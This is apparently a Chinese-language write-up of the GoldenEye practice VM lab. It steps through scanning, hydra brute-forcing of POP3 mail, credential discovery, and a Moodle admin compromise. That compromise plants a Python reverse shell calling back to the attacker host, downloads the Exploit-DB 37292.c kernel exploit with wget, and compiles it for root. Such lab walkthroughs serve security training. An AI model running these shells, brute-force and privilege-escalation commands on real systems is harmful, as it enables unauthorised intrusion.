靶场前提准备

Kali主机IP地址:192.168.230.131

靶机主机IP地址:192.168.230.138

渗透测试流程

查询Kali主机IP地址

命令:

hostname -I

IP a

ifconfig

这三个命令可以查询当前Kali主机的IP地址

这里我用的是IP a参数进行查找的IP地址

Netdiscover查询当前网段的存活主机

命令:

netdiscover -i eth0 -r 192.168.230.0/24

PS:

其中 -i 是用来指定当前主机的网卡;-r 是用来指定扫描网段的

其中进行扫描的IP地址是C类地址

24 的子网掩码是255.255.255.0

为什么不能扫描32的子网掩码呢?(下面就是原因)

只能进行16和24的扫描

192.168.230.138就是靶场的存活IP地址

这里为什么判断192.168.230.138就是靶场地址呢?主要是因为VMware搭建靶场的时候,可以在 虚拟机——>设置——>网络适配器——>高级选项中看到当前虚拟机的MAC地址(相当于当前运行的虚拟机的身份证号)

打开浏览器;访问192.168.230.138

显示“导航到/sev-home/登录”,我们访问192.168.230.138/sev-home/

使用目录扫描工具进行扫描

使用dirb 或者 dirsearch进行目录扫描

工具链接:

v0re/dirb: Web Fuzzer

maurosoria/dirsearch: Web path scanner

Kali 安装:

apt install dirb

apt install dirsearch

如有提示让你选择Y或者N,通常选Y,安装的时候根据自身情况选择

命令:

dirb http://192.168.230.138

没有任何有用的信息

Nmap扫描端口

使用nmap进行扫描端口开放情况

命令:

nmap -p- 192.168.230.138

PS:

这里的 -p- 是全端口扫描也就是1-65535

25端口是smtp、80端口是http,只有55006和55007的端口不知道是开放的什么端口

命令:

nmap -sS -sV -T5 -A -p55006,55007 192.168.230.138

PS:

-sS:是使用nmap的 SYN 扫描

-sV:是使用nmap的 服务版本 检测

-T:也就是nmap的扫描速度 1-5个级别

-A:启用高级扫描选项

-p:指定端口

可知道55006和55007是pop3的开放端口,pop3是邮件服务

返回192.168.230.138的网址页面,F12查看源代码或者在URL地址栏中输入“view-source:http://XXXX.XXXX.XXXX.XXXX”

发现引用了一个terminal.js,查看terminal.js的代码,发现在注释行有相关信息

8 //Boris, make sure you update your default password.

8 //Boris,一定要更新你的默认密码。

9 //My sources say MI6 maybe planning to infiltrate.

9 //我的消息来源说军情六处可能计划潜入。

10 //Be on the lookout for any suspicious network traffic....

10 //注意任何可疑的网络流量....

12 //I encoded you p@ssword below...

12 //我在下面给你编码p@ssword…

16 //BTW Natalya says she can break your codes

16 //顺便说一句,Natalya说她可以破解你的密码

将编码进行解密:

“InvincibleHack3r“

解密网址:

HTML编码解码

解密结果为:“InvincibleHack3r”

尝试登录网址

根据terminal.js获取到的姓名以及刚刚破译的HTML编码信息,我们可以将其组合成字典进行爆破网址的账号和密码

用户名

密码

Boris

InvincibleHack3r

boris

InvincibleHack3r

Natalya

InvincibleHack3r

natalya

InvincibleHack3r

 在用户名为boris的情况下登录进去了网站

使用hydra(九头蛇)进行爆破

命令:

“hydra -l boris -p /usr/share/wordlist/fasttrack.txt 192.168.230.138 -s 55007 pop3”

“hydra -l 用户名 -p 字典目录 IP地址 -s 端口号 协议”

由前面可知用户名为两个,一个是Boris,一个是Natalya

用户名

密码

Natalya

bird

Boris

secret1!

用nc连接IP地址

POP3是一个邮件服务器,可以通过NC进行直接连接

命令:nc IP地址 端口

命令

命令解析

User 用户名

Pop3输入用户名

Pass 密码

Pop3 输入密码

List

列出所有邮件

Retr 数字

选择查看哪封邮件(类似于cat 某文件)

查看Boris的邮件

Boris邮箱

邮件序号

邮件内容

翻译

1

Return-Path: <root@127.0.0.1.goldeneye>

X-Original-To: boris

Delivered-To: boris@ubuntu

Received: from ok (localhost [127.0.0.1])

        by ubuntu (Postfix) with SMTP id D9E47454B1

        for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)

Message-Id: <20180425022326.D9E47454B1@ubuntu>

Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)

From: root@127.0.0.1.goldeneye

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.

网络:< root@127.0.0.1.goldeneye >

X-Original-To:鲍里斯

交付:boris@ubuntu

收到:从ok (localhost [127.0.0.1])

使用ubuntu(后缀),SMTP id为D9E47454B1

<鲍里斯>;1990年4月2日星期二19:22:14 -0700 (PDT)

问题:< 20180425022326。D9E47454B1@ubuntu >

日期:1990年4月2日星期二19:22:14 -0700 (PDT)

来自:root@127.0.0.1.goldeneye

鲍里斯,我是管理员。你可以通过电子方式与同事和学生交流。我不会扫描电子邮件的安全风险,因为我相信您和这里的其他管理员。

2

Return-Path: <natalya@ubuntu>

X-Original-To: boris

Delivered-To: boris@ubuntu

Received: from ok (localhost [127.0.0.1])

        by ubuntu (Postfix) with ESMTP id C3F2B454B1

        for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)

Message-Id: <20180425024249.C3F2B454B1@ubuntu>

Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)

From: natalya@ubuntu

Boris, I can break your codes!

网络:< natalya@ubuntu >

X-Original-To:鲍里斯

交付:boris@ubuntu

收到:从ok (localhost [127.0.0.1])

使用ubuntu(后缀),ESMTP id为C3F2B454B1

<鲍里斯>;1995年4月21日星期二19:42:35 -0700 (PDT)

问题:< 20180425024249。C3F2B454B1@ubuntu >

日期:1995年4月21日星期二19:42:35 -0700 (PDT)

来自:natalya@ubuntu

鲍里斯,我能破解你的密码!

3

Return-Path: <alec@janus.boss>

X-Original-To: boris

Delivered-To: boris@ubuntu

Received: from janus (localhost [127.0.0.1])

        by ubuntu (Postfix) with ESMTP id 4B9F4454B1

        for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)

Message-Id: <20180425025235.4B9F4454B1@ubuntu>

Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)

From: alec@janus.boss

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.

网络:< alec@janus.boss >

X-Original-To:鲍里斯

交付:boris@ubuntu

接收:来自janus (localhost [127.0.0.1])

使用ubuntu(后缀),ESMTP id为4B9F4454B1

<鲍里斯>;1995年4月22日星期三19:51:48 -0700 (PDT)

问题:< 20180425025235.4 b9f4454b1@ubuntu >

日期:1995年4月22日星期三19:51:48 -0700 (PDT)

来自:alec@janus.boss

鲍里斯,

你和我们的辛迪加合作会有大回报的。附件是黄金眼的最终访问密码。把它们放在这个服务器根目录下的一个隐藏文件中,然后从这封电子邮件中删除。这些访问代码只能有一组,我们需要保护它们以便最终执行。如果他们被捕获,我们的计划就会崩溃!

一旦Xenia进入训练地点并熟悉黄金眼终端代码我们将进入最后阶段....

注意安全,否则我们会受到威胁。

查看Natalya的邮箱

Natalya的邮箱

序号

邮件内容

翻译

1

Return-Path: <root@ubuntu>

X-Original-To: natalya

Delivered-To: natalya@ubuntu

Received: from ok (localhost [127.0.0.1])

        by ubuntu (Postfix) with ESMTP id D5EDA454B1

        for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)

Message-Id: <20180425024542.D5EDA454B1@ubuntu>

Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)

From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.

网络:< root@ubuntu >

X-Original-To: natalya

交付:natalya@ubuntu

收到:从ok (localhost [127.0.0.1])

使用ubuntu(后缀),ESMTP id为D5EDA454B1

< natalya >;1995年4月10日(星期二)19:45:33 -0700

问题:< 20180425024542。D5EDA454B1@ubuntu >

日期:1995年4月10日星期二19:45:33 -0700 (PDT)

来自:root@ubuntu

娜塔莉亚,拜托你别再破坏鲍里斯的密码了。另外,你是培训主管。一旦有学生指定给你,我会发邮件给你。

此外,要小心可能的网络入侵。我们有情报说黄金眼正在被一个叫雅努斯的犯罪集团追杀。

2

Return-Path: <root@ubuntu>

X-Original-To: natalya

Delivered-To: natalya@ubuntu

Received: from root (localhost [127.0.0.1])

        by ubuntu (Postfix) with SMTP id 17C96454B1

        for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)

Message-Id: <20180425031956.17C96454B1@ubuntu>

Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)

From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia

password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir

**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.

网络:< root@ubuntu >

X-Original-To: natalya

交付:natalya@ubuntu

接收:从根主机(localhost [127.0.0.1])

使用ubuntu(后缀),SMTP id为17C96454B1

< natalya >;1995年4月29日星期二20:19:42 -0700 (PDT)

问题:< 20180425031956.17 c96454b1@ubuntu >

日期:1995年4月29日(星期二)20:19:42 -0700(太平洋时间)

来自:root@ubuntu

好的,娜塔莉,我给你介绍一个新学生。由于这是一个新系统,如果你看到任何配置问题,请告诉我或boris,特别是与安全有关的问题……即使不是,只要在“安全”的幌子下输入它……它会毫不费力地升级变更顺序:)

好的,用户信用是:

用户名:xenia

密码:RCP90rulez !

鲍里斯证实了她是合法的承包商所以只要创建账户,好吗?

如果你在外部内部域名上没有网址:severnaya-station.com/gnocertdir

**请确保编辑您的主机文件,因为您通常在网络外远程工作....

因为你是一个Linux用户,只要把这个服务器的IP指向/etc/hosts中的severnaya-station.com即可

从Natalya的邮箱中看到了“用户名:xenia密码:RCP90rulez!”,还得知“如果你在外部内部域名上没有网址:severnaya-station.com/gnocertdir**请确保编辑您的主机文件,因为您通常在网络外远程工作....因为你是一个Linux用户,只要把这个服务器的IP指向/etc/hosts中的severnaya-station.com即可”

修改Kali HOST文件

所以我们要先将Linux的/etc/hosts文件将服务器的IP地址指向severnaya-station.com

PS:Linux的hosts文件相当于IP地址与网址相对应的数据库

Vim修改hosts文件

 登录网页:

 输入上述邮件当中的用户名和密码进行登录网页

 用户名:xenia密码:RCP90rulez!

指纹识别 

 通过指纹识别可以得知中间件为Apache 服务器操作系统为Ubuntu Linux

命令:

whatweb http://servernaya-station.com/gnocertdir

在登录网站后,在留言处查找到一封未读的消息

 

XeniaX与Dr Doak的通话

留言内容

留言翻译

09:24 PM: Greetings Xenia,

As a new Contractor to our GoldenEye training I welcome you. Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here.

My email username is...

doak

Thank you,

Cheers,

Dr. Doak "The Doctor"

Training Scientist - Sr Level Training Operating Supervisor

GoldenEye Operations Center Sector

Level 14 - NO2 - id:998623-1334

Campus 4, Building 57, Floor -8, Sector 6, cube 1,007

Phone 555-193-826

Cell 555-836-0944

Office 555-846-9811

Personal 555-826-9923

Email: doak@

Please Recycle before you print, Stay Green aka save the company money!

"There's such a thing as Good Grief. Just ask Charlie Brown" - someguy

"You miss 100% of the shots you don't shoot at" - Wayne G.

THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESS.

晚上09:24:你好,Xenia,

作为金眼培训的新承包商我欢迎你。一旦您的帐户已完成,更多的课程将出现在您的仪表盘。如果你有任何问题,请发邮件给我,不要在这里。

我的邮箱用户名是…

doak

谢谢你!

欢呼,

多克博士"博士"

培训科学家-高级培训操作主管

黄金眼行动中心区域

级别14 - NO2 - id:998623-1334

第4校区第57栋第6区第8层第1007号立方

电话555-193-826

单元555-836-0944

办公室555-846-9811

个人555-826-9923

电子邮件:doak@

请在打印前回收,保持绿色,也为公司省钱!

“有一种东西叫‘好悲伤’。问问查理·布朗吧。

“你错过了百分之百的投篮,你不出手”-韦恩G。

这是一个安全的消息,不要发送它,除非。

由此又得知一个用户名为doak的邮箱用户名,用hydra进行爆破

爆破用户名为doak的邮箱密码

命令:

“hydra -l doak/Doak -P /usr/share/wordlist/fasttrack.txt 192.168.230.138 -s 55007 pop3“

nc登录

Doak邮箱

邮件内容

邮件内容翻译

Return-Path: <doak@ubuntu>

X-Original-To: doak

Delivered-To: doak@ubuntu

Received: from doak (localhost [127.0.0.1])

        by ubuntu (Postfix) with SMTP id 97DC24549D

        for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)

Message-Id: <20180425034731.97DC24549D@ubuntu>

Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)

From: doak@ubuntu

James,

If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak

password: 4England!

网络:< doak@ubuntu >

X-Original-To: doak

交付:doak@ubuntu

接收:来自doak (localhost [127.0.0.1])

使用ubuntu(后缀),SMTP id 97DC24549D

对< doak >;1995年4月30日星期二20:47:24 -0700 (PDT)

问题:< 20180425034731.97 dc24549d@ubuntu >

日期:1995年4月30日星期二20:47:24 -0700 (PDT)

来自:doak@ubuntu

詹姆斯,

如果你正在阅读这篇文章,恭喜你已经走到了这一步。你知道谍报技术是怎么运作的吧?

因为我不知道。去我们的培训网站,登陆我的账号....继续挖,直到你能获取更多信息......

用户名:dr_doak

密码:4England!

得到相关信息,用上面邮件的账号再一次登录http://severnaya-station.com/gnocertdir/这个网站

登录进去之后,在页面的右上角有一个文件夹

点开之后发现一个txt文本

 

Dr_doak

文本内容

文本翻译

007,I was able to capture this apps admin cr3ds through clear txt.Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.Something juicy is located here: /dir007key/for-007.jpg。Also as you may know, the Rcp-90 is vastly superior to any other weapon and License to Kill is the only way to play.

007,

我能够通过clear txt捕获这个应用程序管理cr3ds。GoldenEye服务器中的大多数web应用程序中的文本都会被扫描,所以我不能在这里添加cr3dentials。你可能也知道,Rcp-90比任何其他武器都要好得多,授权杀戮是唯一的玩法。

访问网址

访问网址 192.168.230.138/dir007key/for-007.jpg

 是一张图片,将图片进行下载,查看图片的属性

有一个base64编码,解码

Base64 编码/解码 - 锤子在线工具

Base64 在线编码解码 | Base64 加密解密 - Base64.us

解码得到:xWinter1995x

登录管理员账户

通过上述信息可以得知,这是管理员的密码

用户名:admin

密码:xWinter1995x!

登录之后,发现CMS的版本为2.2.3

查找当前CMS的漏洞

用kali的msfconsole进行搜索该漏洞

命令:

启动命令: msfconsole

搜索命令:search moodle

使用命令:use 序号

对应的漏洞为CVE-2013-10-30:moodle_spelling_binary_rce

运用此漏洞进行获取权限

配置漏洞相关信息,运行漏洞

查看当前需要配置的信息:show options

配置信息:set xxxxx

 当我们执行后发现无法成功,是因为对方需要修改执行PSpellShell 由于我们已经使用了管理员admin用户登录页面,由于使用的是powershell命令,需要在设置中修改: Home ->Site administration->Plugins ->Text editors ->TinyMCE HTML editor 来到此处,修改PSpellShell然后save。

 运行漏洞

配置网页

 在Home / ► Site administration / ► Server / ► System paths 这个路径当中,在Path to aspell当中输入

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.230.131",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PS:代码中的IP地址输入的是要开启监听的机器的IP地址

 

监听端口

用nc -lvp 8888进行监听端口

命令: nc -lvp 8888

在Home / ► My profile / ► Blogs / ► Add a new entry 这个路径点击下方图片标记的位置

开启监听成功

查询当前的用户名为www-data,需要提权

 命令:whoami

查找系统版本:

命令:uname -a

 提权

命令:”searchsploit ubuntu 3.13”

(PS:searchsploit是一款Exploit-DB的命令行搜索工具,也就是漏洞查找工具)

命令“locate linux/local/37292.c“

(PS:locate 是快速查找文件命令)

将目录切换到37292.c所在目录,并用python开启http服务

命令:“python3 -m http.server [80]“或者”python -m SimpleHTTPServer [8080]”

在靶机执行wegt下载

命令:“wget http://192.168.230.131:8000/37292.c“

我们在查看此机器时发现没有gcc,只存在cc那么我们要把37292.c  迷惑点

用vim或者vi或者gedit 37292.c

用vim 在143行把gcc改成cc

PS:尽量去tmp目录下面去下载然后成功以后可以删除文件,不影响服务器的使用

成功下载后,执行CC编译

命令:“cc -o exp 37292.c“

赋权、执行、查看当前权限

赋权命令:“chmod +x exp“

执行命令:“./exp“

查看用户权限命令:“id“

提取成功

查找flag

命令:cat /root/.flag.txt

更多推荐